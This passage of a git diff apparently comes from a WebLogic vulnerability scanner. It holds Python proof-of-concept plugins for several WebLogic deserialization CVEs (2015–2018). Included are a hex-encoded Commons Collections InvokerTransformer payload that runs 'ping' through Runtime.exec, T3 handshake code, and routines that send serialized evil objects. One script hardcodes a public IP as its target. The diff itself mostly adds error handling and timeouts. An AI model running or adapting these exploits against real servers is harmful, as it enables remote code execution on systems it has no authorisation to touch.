e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x19\x70\x69\x6e\x67\x20\x2d\x63\x20\x34\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x35\x33\x2e\x31\x33\x30\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a" + chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + totallength = len(chunk1) + len(chunk2) + len(chunk3) - chunk3 = '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + len_hex = hex(totallength) - totallength = len(chunk1) + len(chunk2) + len(chunk3) + len_hex = len_hex.replace('0x', '0') - len_hex = hex(totallength) + s1 = len_hex[:2] + s2 = len_hex[2:4] + len_hex = unhexlify(s1 + s2) - len_hex = len_hex.replace('0x', '0') + chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' + payload = chunk1 + chunk2 + chunk3 - s1 = len_hex[:2] - s2 = len_hex[2:4] - len_hex = unhexlify(s1 + s2) - - chunk1 = '\x00\x00' + len_hex + '\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' - - - payload = chunk1 + chunk2 + chunk3 - - - payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) - - sock.send(payload) - response = sock.recv(15000) - print(("[*]测试返回内容为{}".format(response))) + payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) + sock.send(payload) + response = sock.recv(15000) + print(("[*]测试返回内容为{}".format(response))) + except Exception as e: + print("CVE_2015_4852脚本出错") if __name__ == '__main__': run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2016_0638.py b/plugins/weblogic_poc/CVE_2016_0638.py index 4a17445..ae55bf6 100644 --- a/plugins/weblogic_poc/CVE_2016_0638.py +++ b/plugins/weblogic_poc/CVE_2016_0638.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['weblogic.jms.common.StreamMessageImpl'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception as e: + print("CVE_2016_0638脚本出错") if __name__=="__main__": rip = '222.85.76.240' diff --git a/plugins/weblogic_poc/CVE_2016_3510.py b/plugins/weblogic_poc/CVE_2016_3510.py index 8813f5a..9cccba8 100644 --- a/plugins/weblogic_poc/CVE_2016_3510.py +++ b/plugins/weblogic_poc/CVE_2016_3510.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2016_3510脚本出错") if __name__=="__main__": rip = '127.0.0.1' diff --git a/plugins/weblogic_poc/CVE_2017_3248.py b/plugins/weblogic_poc/CVE_2017_3248.py index c9d5149..60c57b5 100644 --- a/plugins/weblogic_poc/CVE_2017_3248.py +++ b/plugins/weblogic_poc/CVE_2017_3248.py @@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d VER_SIG=['\\$Proxy[0-9]+'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(7) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -53,14 +54,17 @@ def checkVul(res,server_addr,index): # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(rip,rport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (rip, rport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,rport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (rip, rport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, rport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2017_3246脚本出错") if __name__=="__main__": rip = '127.0.0.1' diff --git a/plugins/weblogic_poc/CVE_2017_3506.py b/plugins/weblogic_poc/CVE_2017_3506.py index 1b2fc62..c251c62 100644 --- a/plugins/weblogic_poc/CVE_2017_3506.py +++ b/plugins/weblogic_poc/CVE_2017_3506.py @@ -64,9 +64,12 @@ def poc(url): result = '[-]目标weblogic未检测到CVE-2017-3506' return result def run(rip,rport): - url=rip+':'+str(rport) - result = poc(url=url) - print(result) + try: + url = rip + ':' + str(rport) + result = poc(url=url) + print(result) + except Exception: + print("CVE_2017_3506脚本出错") if __name__ == '__main__': run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2628.py b/plugins/weblogic_poc/CVE_2018_2628.py index 1f7c360..de4831e 100644 --- a/plugins/weblogic_poc/CVE_2018_2628.py +++ b/plugins/weblogic_poc/CVE_2018_2628.py @@ -20,6 +20,7 @@ VER_SIG=['\\$Proxy[0-9]+'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(6) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) sock.recv(1024) @@ -63,15 +64,18 @@ def checkVul(res,server_addr,index): print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) def run(dip,dport,index): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 - sock.settimeout(10) - server_addr = (dip, dport) - t3handshake(sock,server_addr) - buildT3RequestObject(sock,dport) - rs=sendEvilObjData(sock,PAYLOAD[index]) - # print 'rs',rs - checkVul(rs,server_addr,index) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock, server_addr) + buildT3RequestObject(sock, dport) + rs = sendEvilObjData(sock, PAYLOAD[index]) + # print 'rs',rs + checkVul(rs, server_addr, index) + except Exception: + print("CVE_2018_2628脚本出错") if __name__=="__main__": diff --git a/plugins/weblogic_poc/CVE_2018_2893.py b/plugins/weblogic_poc/CVE_2018_2893.py index 04a978a..9ed03fc 100644 --- a/plugins/weblogic_poc/CVE_2018_2893.py +++ b/plugins/weblogic_poc/CVE_2018_2893.py @@ -21,6 +21,7 @@ VER_SIG=['StreamMessageImpl'] def t3handshake(sock,server_addr): sock.connect(server_addr) + sock.settimeout(6) sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) time.sleep(1) data 